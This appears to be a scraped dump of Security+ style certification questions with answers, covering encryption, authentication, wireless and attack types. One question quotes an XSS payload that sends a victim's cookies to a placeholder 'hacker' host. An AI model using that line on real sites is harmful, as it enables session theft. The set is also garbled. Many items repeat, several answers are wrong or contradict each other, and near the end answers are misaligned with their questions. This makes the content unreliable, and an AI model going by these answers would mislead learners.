A company was recently audited by a third party. The audit revealed the company's network devices were transferring files in the clear. Which of the following protocols should the company use to transfer files?

SCP

Which of the following use the SSH protocol?

SCP SFTP

A security administrator has written a script that will automatically upload binary and text-based configuration files onto a remote server using a scheduled task. The configuration files contain sensitive information. Which of the following should the administrator use? (Select TWO)

SCP and Certificate based authentication

In an effort to reduce storage requirements, some companies to hash every file and eliminate duplicates. The data processing routines are time sensitive so the hashing algorithm is fast and supported on a wide range of system. Which of the following algorithms is BEST suited for this purpose?

SHA

When generating a request for a new x.509 certificate for securing a website, which of the following is the MOST appropriate hashing algorithm?

SHA

Which of the following cryptographic algorithms is irreversible?

SHA-256

A manager wants to distribute a report to several other managers with the company. Some of them reside in remote locations that are not connected to the domain but have a local server. Because there is sensitive data within the report and the size of the report is beyond the limit of the email attachment size, emailing the report is not an option. Which of the following protocols should be implemented to distribute the report securely? (Select THREE)

SSH FTPS HTTPS

An analyst is using a vulnerability scanner to look for common security misconfigurations on devices. Which of the following might be identified by the scanner? (Select two)

SSH is enabled on servers The firewall is disabled on workstations

An application developer is designing an application involving secure transports from one service to another that will pass over port 80 for a request. Which of the following secure protocols is the developer MOST likely to use?

SSL

A security engineer wants to implement a site-to-site VPN that will require SSL certificates for mutual authentication. Which of the following should the engineer implement if the design requires client MAC addresses to be visible across the tunnel?

SSL VPN

A security engineer wants to implement a site-to-site VPN that will require SSL certificates for mutual authentication. Which of the following should the engineer implement if the design requires client MAC address to be visible across the tunnel?

SSL VPN

The POODLE attack is a MITM exploit that affects:

SSLv2.0 with CBC mode cipher.

The POODLE attacks is a MITM exploit that affects:

SSLv3.0 with CBC mode cipher

A company wants to implement an access management solution that allows employees to use the same usernames and passwords for multiple applications without having to keep multiple credentials synchronized. Which of the following solutions would BEST meet these requirements?

SSO

A company wants to implement an access management solution that allows employees to use the same usernames and passwords for multiple applications without having to keep multiple credentials synchronized. Which of the following solutions would BEST meet these requirements? (Choose Two)

SSO, Federation

Larry is a network administrator for a small accounting firm and has heard some of his users complaining of slow connectivity. When he started investigating the firewall logs, he saw a large number of half-open connections. What best describes his findings?

SYN Flood

Of the following cloud service models, which service gives the consumer the ability to use applications provided by the cloud service provider over the Internet?

SaaS (Software as a Service)

Which of the following is a deployment concept that can be used to ensure only the required OS access is exposed to software applications?

Sandboxing

Which of the following is a deployment concept that can be used to ensure only the required OS access is exposed to software applications?

Sandboxing

Which of the following solutions should an administrator use to reduce the risk from an unknown vulnerability in a third-party software application?

Sandboxing

Which of the following solutions should an administrator use to reduce the risk from an unknown vulnerability in a third-party software application?

Sandboxing

John David works for a large retail company that processes credit card purchases and has been asked to test the network for security issues. The specific test he is running involves checking policies, documentation and past incident reports. What describes this type of test?

Security Audit

Gary is concerned about unauthorized people entering the company's building. Of the following, which would be most effective in preventing this

Security Guards

A security administrator is developing training for corporate users on basic security principles for personal email accounts. Which of the following should be mentioned as the MOST secure way for password recovery?

Sending a PIN to a smartphone through text message

Larry is responsible for NIDS/NIPS in his company and has configured a new NIPS solution. What part of this device collects data?

Sensor

A manager suspects that an IT employee with elevated database access may be knowingly modifying financial transactions for the benefit of a competitor. Which of the following practices should the manager implement to validate the concern?

Separation of duties

An audit has revealed that database administrators are also responsible for auditing database changes and backup logs. Which of the following access control methodologies would BEST mitigate this concern?

Separation of duties

A computer on a company network was infected with a zero-day exploit after an employee accidentally opened an email that contained malicious content. The employee recognized the email as malicious and was attempting to delete it, but accidentally opened it. Which of the following should be down to prevent this scenario from occurring again in the future?

Set the email program default to open messages in plain text

A security analyst is reviewing the password policy for a service account that is used for a critical network service. The password policy for this account is as follows: Which of the following adjustments would be the MOST appropriate for the service account?

Set the maximum password age to 15 days

A security administrator needs an external vendor to correct an urgent issue with an organization's physical access control system (PACS). The PACS does not currently have internet access because it is running a legacy operating system. Which of the following methods should the security administrator select the best balances security and efficiency?

Set up VPN concentrator for the vendor and restrict access to the PACS using desktop sharing

A company wants to ensure confidential data from storage media is sanitized in such a way that the drive cannot be reused. Which of the following method should the technician use?

Shredding

A company wants to ensure confidential data from storage media is sanitized in such a way that the drive cannot be reused. Which of the following method should the technician use?

Shredding

A security administrator needs to implement a system that detects possible intrusions based upon a vendor provided list. Which of the following BEST describes this type of IDS?

Signature based

Which of following authentication concepts is gait analysis MOST closely associated?

Something you do

An employer requires that employees use a key-generating app on their smartphones to log into corporate applications. In terms of authentication of an individual, this type of access policy is BEST defined as:

Something you have

Of the following email security measures, which item would have the greatest impact on phishing emails?

Spam Filter

Ron is analyzing what he thinks is a malware outbreak on his network. Several users have reported that their machines are behaving strangely. The behavior seems to be occurring sporadically and there is no pattern. What is most likely the cause of the issue?

Sparse infector virus

John is a sales manager at his company. He has recently received an email asking him to click a link to fill out a survey. The email seems suspicious but it does mention a major association of which he's familiar, and makes him think it may be a legitimate email. Of the following, which best describes this attack?

Spear Phishing

An employee receives an email, which appears to be from the Chief Executive Officer (CEO), asking for a report of security credentials for all users. Which of the following types of attack is MOST likely occurring?

Spear phishing

A system administrator wants to provide for and enforce wireless access accountability during events where external speakers are invited to make presentations to a mixed audience of employees and non-employees. Which of the following should the administrator implement?

Sponsored guest

A systems administrator wants to provide for and enforce wireless access accountability during events where external speakers are invited to make presentations to a mixed audience of employees and non-employees. Which of the following should the administrator implement?

Sponsored guest

An external attacker can modify the ARP cache of an internal computer. Which of the following types of attacks is described?

Spoofing

An external attacker can modify the ARP cache of an internal computer. Which of the following types of attacks is described?

Spoofing

A new hire wants to use a personally owned phone to access company resources. The new hire expresses concern about what happens to the data on the phone when they leave the company. Which of the following portions of the company's mobile device management configuration would allow the company data to be removed from the device without touching the new hire's data?

Storage segmentation

The Chief Security Officer (CISO) at a multinational banking corporation is reviewing a plan to upgrade the entire corporate IT infrastructure. The architecture consists of a centralized cloud environment hosting the majority of data, small server clusters at each corporate location to handle the majority of customer transaction processing, ATMs, and a new mobile banking application accessible from smartphones, tablets, and the Internet via HTTP. The corporation does business having varying data retention and privacy laws. Which of the following technical modifications to the architecture and corresponding security controls should be implemented to provide the MOST complete protection of data?

Store customer data based on national borders, ensure end-to-end encryption between ATMs, end-users, and servers, test redundancy and COOP plans to ensure data is not inadvertently shifted from one legal jurisdiction to another with more stringent regulations

Which of the following would be considered multifactor authentication?

Strong password and fingerprint

A small company's Chief Executive Officer (CEO) has asked its Chief Security Officer (CSO) to improve the company's security posture quickly with regard to targeted attacks. Which of the following should the CSO conduct Fl AST?

Survey threat feeds from services inside the same industry.

Of the listed users, which is a role-based position that should receive training on how to manage particular systems?

System Owners

A server administrator needs to administer a server remotely using RDP, but the specified port is closed on the outbound firewall on the network. The access the server using RDP on a port other than the typical registered port for the RDP protocol?

TLS

An organization wishes to provide better security for its name resolution services. Which of the following technologies does BEST support the deployment of DNSSEC at the organization?

TLS

Laura is responsible for security on the new e-commerce server. She would like to verify that online transactions are secure. What technology should she use?

TLS (Transport Layer Security)

Tracie has been using a packet sniffer to observe traffic in the company network and has noticed that traffic between the web server and the database server is sent in clear text. She would like a solution that will encrypt traffic and also leverage the existing digital certificate infrastructure the company has. Which of the following is the best solution?

TLS (Transport Layer Security)

A systems administrator has implemented multiple websites using host headers on the same server. The server hosts two websites that require encryption and other websites where encryption is optional. Which of the following should the administrator implement to encrypt web traffic for the required websites?

TLS host certificate

Melanie manages the website security for a bank. When a user forgets their password, she wants to be able to give them a temporary password. What is the best solution for this situation?

TOTP

Least privilege

The IT department needs to prevent users from installing untested applications. Which of the following would provide the BEST solution?

A security analyst is updating a BIA document. The security analyst notices the support vendor's time to replace a server hard drive went from eight hours to two hours. Given these new metrics, which of the following can be concluded? (Select two)

The MTTR is faster The RTO has decreased

A security analyst us updating a BIA document. The security analyst notices the support vendor's time to replace a server hard drive went from eight hours to two hours. Given these new metrics, which of the following can be concluded?

The MTTR is faster. The RTO has decreased.

When trying to log onto a company's new ticketing system, some employees receive the following message: Access denied: too many concurrent sessions. The ticketing system was recently installed on a small VM with only the recommended hardware specifications. Which of the following is the MOST likely cause for this error message?

The VM does not have enough processing power.

An attacker exploited a vulnerability on a mail server using the code below: Which of the following BEST explains what the attacker is doing?

The attacker is replacing a document

An attacker exploited a vulnerability on a mail server using the code below. <HTML><body onl oad=document.location.replace ('http://hacker/post.asp?victim&message=" + document.cookie + "<br>" + "URL:" +"document.location) ; I> <lbodY> </HTML> Which of the following BEST explains what the attacker is doing?

The attacker is replacing a document.

A security analyst is reviewing the following output from an IPS: [*] [1:2467:7:] EXPLOIT IGMP IGAP message overflow attempt [*] [Classification: Attempted administrator privilege gain] [Priority: 1] 07/30-19:45:02.238185 250.19.18.71 -> 250.19.18.22 IGMP TTL:255 TOS: 0x0 ID: 9742 IpLen:20 DgmLen: 502 MF Frag offset: 0x1FFF Frag Size: 0x01E2 [Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2004-0367] Given this output, which of the following can be concluded? (Select two.)

The attacker sent a malformed IGAP packet, triggering the alert. The source IP of the attack is coming from 250.19.18.71

A company has three divisions, each with its own networks and services. The company decides to make its secure web portal accessible to all employees utilizing their existing usernames and passwords. The security administrator has elected to use SAML to support authentication. In this scenario, which of the following will occur when users try to authenticate to the portal? (Select two)

The back-end networks will function as an identity provider and issue an authentication assertion The portal will request an authentication ticket from each network that is transitively trusted.

A user receives an email from ISP indicating malicious traffic coming from the user's home network is detected. The traffic appears to be Linux-based, and it is targeting a website that was recently featured on the news as being taken offline by an internet attack. The only Linux device on the network is a home surveillance camera system. Which of the following BEST describes what is happening?

The camera system is infected with a bot

A user typically works remotely over the holidays using a web-based VPN to access corporate resources. The user reports getting untrusted host errors and being unable to connect. Which of the following is MOST likely the case?

The certificate has expired

A user typically works remotely over the holidays using a web-based VPN to access corporate resources. The user reports getting untrusted host errors and being unable to connect. Which of the following is MOST likely the case?

The certificate has expired

After correctly configuring a new wireless enabled thermostat to control the temperature of the company's meeting room, Joe, a network administrator determines that the thermostat is not connecting to the internet-based control system. Joe verifies that the thermostat received the expected network parameters and it is associated with the AP. Additionally, the other wireless mobile devices connected to the same wireless network are functioning properly. The network administrator verified that the thermostat works when tested at his residence. Which of the following is the MOST likely reason the thermostat is not connecting to the internet?

The company implements a captive portal

Ellen manages network security and has discovered behavior on a computer that appears as a virus. She identified a file she thinks may be a virus, but no antivirus program has detected the file. Which could most likely be occurring?

The computer has a zero-day exploit

A security analyst is reviewing patches on servers. One of the servers is reporting the following error message in the WSUS management console: The computer has not reported status in 30 days. Given this scenario, which of the following statements BEST represents the issue with the output above?

The computer in question has not pulled the latest application software updates

A security administrator has found a hash in the environment known to belong to malware. The administrator then finds this file to be in the preupdate area of the OS, which indicated it was pushed from the central patch system. File: winx86_adobe_upgrade.exe Hash: 99ac28bede43ab869b853ba62c4ea243 Given the above output, which of the following MOST likely happened?

The file was infected when the patch manager downloaded it

During a monthly vulnerability scan, a server was flagged for being vulnerable to an Apache Struts exploit. Upon further investigation, the developer responsible for the server informs the security team that Apache Struts is not installed on the server. Which of the following BEST describes how the security tram should reach to this incident?

The finding is a false positive and can be disregarded

An analyst is using a vulnerability scanner to look for common security misconfigurations on devices. Which of the following might be identified by the scanner? (Select TWO).

The firewall is disabled on workstations Default administrator credentials exist on networking hardware.

A new firewall has been placed into service at an organization. However, a configuration has not been entered on the firewall. Employees on the network segment covered by the new firewall report they are unable to access the network. Which of the following steps should be completed to BEST resolve the issue?

The firewall should be configured to prevent user traffic from matching the implicit deny rule

A workstation puts out a network request to locate another system. Joe, a hacker on the network, responds before the real system does, and he tricks the workstation into communicating with him. Which of the following BEST describes what occurred?

The hacker exploited weak switch configuration

Which of the following occurs when the security of a web application relies on JavaScript for input validation?

The integrity of the data is at risk

Rhonda manages account security for her company. She's noticed a receptionist who has an account with a six-character password that hasn't been changed in two years and her password history isn't maintained. What is the most significant problem with this account?

The password length is most significant problem

An employee workstation with an IP address of 204.211.38.211/24 reports it is unable to submit print jobs to a network printer at 203.211.38.52/24 after a firewall upgrade. The active firewall rules are as follows: Assuming port numbers have not been changed from their defaults, which of the following should be modified to allow printing to a network printer?

The permit statement for 204.211.28.52/24 should be changed to TCP port 631 instead of UDP

Which of the following best describes the initial processing phase used in mobile device forensics?

The phone and storage cards should be examined as a complete unit after examining the removable storage cards separately.

Nate is considering the use of biometric access control systems for his company. He's concerned about the crossover error rate (CER), so which of the following processes would most accurately describe the CER?

The point at which false rejections and false acceptances are equal

Which of the following explains why vendors publish MD5 values when they provide software patches for their customers to download over the internet?

The recipient can verify the integrity of the software patch

A help desk is troubleshooting user reports that the corporate website is presenting untrusted certificate errors to employees and customers when they visit the website. Which of the following is the MOST likely cause of this error, provided the certificate has not expired?

The root CA has revoked the certificate of the intermediate CA

Which of the following network vulnerability scan indicators BEST validates a successful, active scan?

The scan output lists SQL injection attack vectors

A consultant has been tasked to assess a client's network. The client reports frequent network outages. Upon viewing the spanning tree configuration, the consultant notices that an old and law performing edge switch on the network has been elected to be the root bridge. Which of the following explains this scenario?

The switch has the lowest MAC address

Six months into development, the core team assigned to implement a new internal piece of software must convene to discuss a new requirement with the stakeholders. A stakeholder identified a missing feature critical to the organization, which must be implemented. The team needs to validate the feasibility of the newly introduced requirement and ensure it does not introduce new vulnerabilities to the software and other applications that will integrate with it. Which of the following BEST describes what the company?

The system analysis phase of SSDSLC

A user of the wireless network is unable to gain access to the network. The symptoms are: (1) unable to connect to both internal and internet resources; (2) the wireless icon shows connectivity but has no network access. The wireless network is WPA2 Enterprise and users must be a member of the wireless security group to authenticate. Which of the following is the MOST likely cause of the connectivity issues?

The user's laptop only supports WPA and WEP

A user clicked on an email link that led to a website than infected the workstation with a virus. The virus encrypted all the network shares to which the user had access. The virus was not deleted or blocked by the company's email filter, website filter, or antivirus. Which of the following describes what occurred?

The virus was a zero-day attack

A black hat hacker is enumerating a network and wants to remain covert during the process. The hacker initiates a vulnerability scan. Given the task at hand the requirement of being covert, which of the following statements BEST indicates that the vulnerability scan meets these requirements?

The vulnerability scanner is performing in network sniffer mode

A technician receives a device with the following anomalies : / F requent pop-up ads Show response-time switching between active programs Unresponsive peripherals The technician reviews the following log file entries: File Name Source MD5 Target MD5 Status antivirus.exe F794F21CD33E4F57890DDEA5CF267E D2 F794F21CD33E4F57890DDEA5CF267ED2 Automatic iexplore.exe 7FAAF21CD33E4F57890DDEA5CF29C CEA AA87F21CD33E4F57890DDEAEE2197333 Automatic service.exe 77FF390CD33E4F57890DDEA5CF2888 1F 77FF390CD33E4F57890DDEA5CF28881F Manual USB.exe , E289F21CD33E4F57890DDEA5CF28E DC0 E289F21CD33E4F57890DDEA5CF28EDC0 Stopped Based on the above output, which of the following should be reviewed?

The web application firewall

The company you work for is receiving a high call volume in regard to users trying to access the company website and receiving certificate errors. Which of the following best describes the issue?

The website certificate has expired

A security analyst reviews the following output: (file MD5 ****ed up) The analyst loads the hash into the SIEM to discover if this has is seen in other parts of the network. After inspecting a large number of files, the security analyst reports the following: (long file hash) Which of the following is the MOST likely cause of the has been found in other areas?

There are MD5 hash collisions

Penny, a saleslady in your company, sent in a request for assistance with a computer that is behaving sluggishly. You've checked but don't see any obvious malware, but you did locate a temp folder with JPEGs which are screenshots of his desktop. Of the following, which is most likely the cause?

There is spyware on the system.

Mike works for a company where employees have wearable technology, such as smartwatches. What is the most significant security concern for him in regard to such devices?

These devices can be used to carry data in/out of the company

Ashley is the network administrator for a company. She proceeds to delete the account for a user who left the company last week. The user's files were encrypted with a private key. How can Ashley view these files?

They can be decrypted using a recovery agent

Which of the following statements is true about symmetric algorithms?

They use a single key to encrypt-decrypt

You're tasked with configuring a friend's SOHO router and noticed a PIN on the back of their router. What is the purpose of this PIN?

This is a WPS (WiFi Protected Setup) PIN

Matt just became the new security officer for a university. He's concerned that student workers who work late could try to log in with faculty credentials. Which of the following is the most beneficial for preventing these actions?

Time of day restrictions

The help desk received a call after hours from an employee who was attempting to log into the payroll server remotely. When the help desk returned the call the next morning, the employee was able to log into the server remotely without incident. However, the incident occurred again the next evening. Which of the following BEST describes the cause of the issue?

Time of day restrictions

A call center company wants to implement a domain policy primarily for its shift workers. The call center has large groups with different user roles. Management wants to monitor group performance. Which of the following is the BEST solution for the company to implement?

Time-of-day restrictions

The help desk received a call after hours from an employee who was attempting to log into the payroll server remotely without incident. However, the incident occurred again the next evening. Which of the following BEST describes the cause of the issue?

Time-of-day restrictions prevented the account from logging in

Which of the following are the MAIN reasons why a systems administrator would install security patches in a staging environment before the patches are applied to the production server? (Select two)

To allow users to test functionality To prevent server availability issues

Kevin is going over his company's recertification policy. Which is the best reason to recertify?

To audit permissions

A network operations manager has added a second row of server racks in the datacenter. These racks face the opposite direction of the first row of racks. Which of the following is the reason the manager installed the racks this way?

To create environmental hot and cold aisles

Kevin manages the security for his company and is working to implement a kernel integrity subsystem for key servers. Of the following list, what is the primary benefit of this?

To detect whether files have been altered.

What is the purpose of screen locks on mobile devices?

To limit access to the device

Which of the following is the BEST reason for salting a password hash before it is stored in a database?

To prevent duplicate values from being stored

Which of the following is the best reason for salting a password hash before it is stored in a database

To prevent duplicates value for being stored

Which of the following is the BEST reason to run an untested application is a sandbox?

To prevent the application from acquiring escalated privileges and accessing its host system

A systems administrator is installing a new server in a large datacenter. Which of the following BEST describes the importance of properly positioning servers in the rack to maintain availability?

To provide consistent airflow

Management wishes to add another authentication factor in addition to fingerprints and passwords in order to have three-factor authentication. Which of the following would BEST satisfy this request?

Token fob

A company recently replaced its unsecure email server with a cloud-based email and collaboration solution that is managed by a third party. Which of the following actions did the company take regarding risks related to its email and collaboration services?

Transference

A company determines that it is prohibitively expensive to become compliant with new credit card regulations. Instead, the company decides to purchase insurance to cover the cost of any potential loss. Which of the following is the company doing?

Transferring the risk

Of the following, which is the most significant disadvantage of federated identities?

Transitive Trust

A technician needs to implement a system which will properly authenticate users by their username and password only when the users are logging in from a computer in the office building. Any attempt to authenticate from a location other than the office building should be rejected. Which of the following MUST the technician implement?

Transitive authentication

An attacker trying to gain access to your network is sending users a link to a free stock-monitoring program. However, that stock-monitoring program is attached to a software that will give an attacker access to any machine it is installed on. What type of attack is this?

Trojan Horse

An organization has implemented an IPSec VPN access for remote users. Which of the following IPSec would be the MOST secure for this organization to implement?

Tunnel mode

You're responsible for an always-on VPN connection for your company and have been told that it must utilize the most secure mode for IPSec possible. Which of the following is best?

Tunneling

You work for a company that requires a user's credentials to include providing something they know and something they are. Which of the following types of authentication is being described?

Two-Factor

Which of the following is a technical preventive control?

Two-factor authentication

A company is planning to encrypt the files in several sensitive directories of a file server with a symmetric key. Which of the following could be used?

TwoFish

Choose the type of hypervisor known as "bare metal"?

Type 1

Before an infection was detected, several of the infected devices attempted to access a URL that was similar to the company name but with two letters transposed. Which of the following BEST describes the attack vector used to infect the devices?

Typosquatting

Jeff, a network administrator, has discovered that someone registered a domain name that is spelled just one letter different from the company's domain. The website with the misspelled URL is a phishing site. What best describes this attack?

Typosquatting

Paul is the web security administrator for a website that does online auctions. A few users are complaining that when they log in to the website, they get a message stating it's down to try again later. Paul checks and he can visit the site without any problem, even from outside of the network. He also checks the web server log but there is no entry of these users ever connecting. Of the following, which best explains this situation?

Typosquatting

Bob is responsible for network security at a very small company, so due to budget constraints and space constraints, he can only choose one security device. What should he select?

UTM (Unified Threat Management)

You have recently completed a review of company network traffic and saw where most of the malware infections are caused by users who visit illicit websites. You would like to implement a solution that will block these websites while scanning all network traffic for signs of malware and block the malware before it enters the company network. Which technology would be the best solution?

UTM (Unified Threat Management)

A security technician has been receiving alerts from several servers that indicate load balancer have had a significant increase in traffic. The technician initiates a system scan. The scan results illustrate that the disk space on several servers has reached capacity. The scan also indicates that incoming internet traffic to the servers has increased. Which of the following is the MOST likely cause of the decreased disk space?

Unauthorized software

A security technician has been receiving alerts from several servers that indicate load balancers have had a significant increase in traffic. The technician initiates a system scan. The scan results illustrate that the disk space on several servers has reached capacity. The scan also indicates that incoming internet traffic to the servers has increased. Which of the following is the MOST likely cause of the decreased disk space?

Unauthorized software

Which of the following vulnerability types would the type of hacker known as a script kiddie be MOST dangerous against?

Unpatched exploitable internet-facing services

A forensic expert is given a hard drive from a crime scene and is asked to perform an investigation. Which of the following is the FIRST step the forensic expert needs to take the chain of custody?

Update the evidence log

A forensic expert is given a hard drive from a crime scene and is asked to perform an investigation. Which of the following is the FIRST step the forensic expert needs to take the chain of custody?

Update the evidence log

Users report the following message appears when browsing to the company's secure site: This website cannot be trusted. Which of the following actions should a security analyst take to resolve these messages? (Select two)

Update the root certificate into the client computer certificate store Verify the certificate has not expired on the server

Jamie is worried that some users on her network could be accessing some files they don't have a reason to view, such as files not required for their job. Which of the following would best determine if this is happening?

Usage audit and review

Josh, as an administrator for a health care company, is required to support an older, legacy application. He's concerned about the application having some vulnerabilities that would affect the remainder of the network. Of the following, which option is the most efficient way to mitigate this?

Use an Application Container

Janet has to deploy and support a legacy application where the configuration for this application and the OS are very specific and cannot be changed. Of the following options, which is the best approach to deploy this software?

Use an immutable server

A company has two wireless networks utilizing captive portals. Some employees report getting a trust error in their browsers when connecting to one of the networks. Both captive portals are using the same server certificate for authentication, but the analyst notices the following differences between the two certificate details: Which of the following would resolve the problem?

Use certificate chaining

A company has two wireless networks utilizing captive portals. Some employees report getting a trust error in their browsers when connecting to one of the networks. Both captive portals are using the same server certificate for authentication, but the analyst notices the following differences between the two certificate details: Certificate 1 Certificate Path: Geotrust Global CA *company.com Certificate 2 Certificate Path: *company.com Which of the following would resolve the problem?

Use certificate chaining.

A security analyst wishes to increase the security of an FTP server. Currently, all traffic to the FTP server is unencrypted. Users connecting to the FTP server uses a variety of modern FTP client software. The security analyst wants to keep the same port and protocol, while also still allowing unencrypted connections. Which of the following would BEST accomplish these goals?

Use explicit FTPS for connections.

Company XYZ has decided to make use of a cloud-based service that requires mutual, certificate-based authentication with its users. The company uses SSL-inspecting IDS at its network boundary and is concerned about the confidentiality of the mutual authentication. Which of the following model prevents the IDS from capturing credentials used to authenticate users to the new service or keys to decrypt that communication?

Use of active directory federation between the company and the cloud-based service

Ann, a college professor, was recently reprimanded for posting disparaging remarks regarding her coworkers on a web site. Ann stated that she was not aware that the public was able to view her remarks. Which of the following security-related trainings could have made Ann aware of the repercussions of her actions?

Use of social networking

A bank is experiencing a DoS attack against an application designed to handle 500 IP-based sessions. In addition, the perimeter router can only handle 1 Gbps of traffic. Which of the following should be implemented to prevent a DoS attack in the future?

Use redundancy across all network devices and services

A bank is experiencing a DoS attack against an application designed to handle 500IP-based sessions. in addition, the perimeter router can only handle 1Gbps of traffic. Which of the following should be implemented to prevent a DoS attacks in the future?

Use redundancy across all network devices and services

Laura is concerned about social engineering, specifically that this technique could be used by an attacker to obtain information about their network, even those relating to passwords. What countermeasure can be taken to ensure she's most effective in combating social engineering?

User Training

During a recent audit, it was discovered that several user accounts belonging to former employees were still active and had valid VPN permissions. Which of the following would help reduce the amount of risk the organization incurs in this situation in the future?

User access reviews

A systems administrator is attempting to recover from a catastrophic failure in the datacenter. To recover the domain controller, the systems administrator needs to provide the domain administrator credentials. Which of the following account types is the systems administrator using?

User account

An organization is providing employees on the shop floor with computers that will log their time based on when they sign on and off the network. Which of the following account types should the employees receive?

User account

A systems administrator is attempting to recover from a catastrophic failure in the datacenter. To recover the domain controller, the systems administrator needs to provide the domain administrator credentials. Which of the following account types is the system administrator using?

User accounts

After a merger, it was determined that several individuals could perform the tasks of a network administrator in the merged organization. Which of the following should have been performed to ensure that employees have proper access?

User rights and permissions review

A remote user (User1) is unable to reach a newly provisioned corporate windows workstation. The system administrator has been given the following log files from the VPN, corporate firewall and workstation host. Which of the following is preventing the remote user from being able to access the workstation?

User1 has been locked out due to too many failed passwords

Leo noticed that attackers have breached his wireless network. They seem to have used a brute-force attack on the WiFi protected setup PIN to exploit the WAP and recover the WPA2 password. What type of attack is this?

WPS Attack

Verify the certificate has not expired on the server. Update the root certificate into the client computer certificate store.

Users report the following message appears when browsing to the company's secure site: This website cannot be trusted. Which of the following actions should a security analyst take to resolve these messages? (Select two.)

Kenny is responsible for data backups from all the company servers. Two major concerns are the frequency of backup and the security of the backup data. Which feature, would be the most important?

Using Data Encryption

An attack that is using interference as its main attack to impede network traffic is which of the following?

Using a similar wireless configuration of a nearby network

A dumpster diver recovers several hard drives from a company and is able to obtain confidential data from one of the hard drives. The company then discovers its information is posted online. Which of the following methods would MOST likely prevented the data from being exposed?

Using magnetic fields to erase the data

A dumpster diver recovers several hard drives from a company and is able to obtain confidential data from one of the hard drives. The company then discovers its information is posted online. Which of the following methods would have MOST likely prevented the data from being exposed?

Using magnetic fields to erase the data

In terms of encrypting data, which of the following is BEST described as a way to safeguard password data by adding random data to it in storage?

Using salt

A Chief Information Security Officer (CISO) asks the security architect to design a method for contractors to access the company's internal network securely without allowing access to systems beyond the scope of their project. Which of the following methods would BEST fit the needs of the CISO?

VPN

A network administrator wants to implement a method of securing internal routing. Which of the following should the administrator implement?

VPN

Which of the following is an important step to take BEFORE moving any installation packages from a test environment to production?

Verify the hashes of files

Which of the following technologies would be MOST appropriate to utilize when testing a new software patch before a company-wide deployment?

Virtualization

Charlotte is a network administrator and needs to administer several servers. Her task is to make it easier to administer and secure these servers, as well as make the installation of new servers more streamlined. Which of the following best addresses this issue?

Virtualizing the servers

Anne, the Chief Executive Officer (CEO), has reported that she is getting multiple telephone calls from someone claiming to be from the helpdesk. The caller is asking to verify her network authentication credentials because her computer is broadcasting across the network. This is MOST likely which of the following types of attacks?

Vishing

Which of the following types of attacks occurs when an attacker calls up people over the phone and attempts to trick them into providing their credit card information?

Vishing

Which of the following describes the key difference between vishing and phishing attacks?

Vishing attacks are accomplished using telephony services

Which of the following describes the key difference between vishing and phishing attacks?

Vishing attacks are accomplished using telephony services.

You are currently testing your company network for security issues. The test you're conducting involves using automated and semi-automated tools to look for known vulnerabilities with various systems. Which of the following best describes this test?

Vulnerability Scan

In your network, there are over 150 computers. You need to determine which ones are secure and which ones are not secure. Which of the following tools would best meet your needs for the assessment?

Vulnerability Scanner

A security administrator is tasked with conducting an assessment made to establish the baseline security posture of corporate IT infrastructure must report actual flaws and weaknesses in the infrastructure. Due to the expense of hiring outside consultants, the testing must be performed using in-house or cheaply available resources. There cannot be a possibility of any requirement being damaged in the test. Which of the following has the administrator been tasked to perform?

Vulnerability assessment

During a recent audit, it was discovered that many services and desktops were missing security patches. Which of the following BEST describes the assessment that was performed to discover this issue?

Vulnerability scan

Which of the following would verify that a threat does exist and security controls can easily be bypassed without actively testing an application?

Vulnerability scan

A security analyst is reviewing an assessment report that includes software versions, running services, supported encryption algorithms, and permission settings. Which of the following produced the report?

Vulnerability scanner

A security analyst is reviewing an assessment report that includes software versions, running services, supported encryption algorithms, and permission settings. Which of the following produced the report?

Vulnerability scanner

A company hires a consulting firm to crawl its Active Directory network with a non-domain account looking for unpatched systems. Actively taking control of systems is out of scope, as is the creation of new administrator accounts. For which of the following is the company hiring the consulting firm?

Vulnerability scanning

Scott manages WiFi security for his company. His main worry is that there are many other offices in the building that could easily attempt to breach their WiFi from one of these locations. Of the options below, which technique works best to address these concerns?

WAP Placement

An instructor is teaching a hands-on wireless security class and needs to configure a test access point to show students an attack on a weak protocol. Which of the following configurations should the instructor implement?

WEP

Neil is given the task of creating a wireless network for his company. The wireless network needs to implement a wireless protocol that provides the maximum level of security while providing support for older wireless devices, simultaneously. Which protocol should be used?

WPA (Wi-Fi Protected Access)

Steven is making an outline of plans to implement a wireless network. Which protocol was designed to provide security for a wireless network and is considered to be the most secure from the choices below?

WPA 2

Which of the standards below was developed by the WiFi Alliance and is used to implement the requirements of IEEE 802.11i??

WPA 2 (Wi-Fi Protected Access 2)

A system administrator wants to provide a balance between the security of a wireless network and usability. The administrator is concerned with wireless encryption compatibility of older devices used by some employees. Which of the following would provide strong security and backward compatibility when accessing the wireless network?

WPA using a pre shared key

An administrator is replacing a wireless router. The configuration of the old wireless router was not documented before it stopped functioning. The equipment connecting to the wireless network uses older legacy equipment that was manufactured prior to the 802.11i standard. Which of the following configuration options should the administrator select for the new wireless router?

WPA+TKIP

Ricky is over WiFI security for his company. Which wireless security protocol below uses TKIP?

WPA-Wi-Fi Protected Access

An administrator is replacing a wireless router. The configuration of the old wireless router was not documented before it stopped functioning. The equipment connecting to the wireless network uses older legacy equipment that was manufactured prior to the release of the 802.11i standard. Which of the following configuration options should the administrator select for the new wireless router?

WPA2+TKIP

A network administrator at a small office wants to simplify the configuration of mobile clients connecting to an encrypted wireless network. Which of the following should be implemented if the administrator does not want to provide the wireless password or certificate to the employees?

WPS

A network administrator at a small office wants to simplify the configuration of mobile clients connecting to an encrypted wireless network. Which of the following should be implemented if the administrator does not want to provide the wireless password or the certificate to the employees?

WPS

A oftware development manager is taking over an existing software development project. The team currently suffers from poor communication due to a long delay between requirements documentation and feature delivery. This gap is resulting in an above average number of security-related bugs making it into production . Which of the following development methodologies is the team MOST likely using now?

Waterfall

A software development manager is taking over an existing software development project. The team currently suffers from poor communication due to a long delay between requirements documentation and feature delivery. This gap is resulting in an above average number of security-related bugs making it into production. Which of the following development methodologies is the team MOST likely using now?

Waterfall

What type of attack is focused on targeting a specific individual like the CEO of a company?

Whaling

Which of the following types of attacks occurs when an attacker specifically targets the CEO, CFO, CIO, and other board members during their attack?

Whaling

XSS (Cross-site scripting)

Which of the following attack types BEST describes a client-side attack that is used to manipulate an HTML iframe with JavaScript code via a web browser?

DDoS

Which of the following attacks specifically impacts data availability?

The scan results identify the hostname and IP address.

Which of the following network vulnerability scan indicators BEST validates a successful, active scan?

Community

Which of the following types of cloud Infrastructures would allow several organizations with similar structures and interests to realize shared storage and resources?

Inactive local accounts

Which of the following would MOST likely appear in an uncredentialed vulnerability scan?

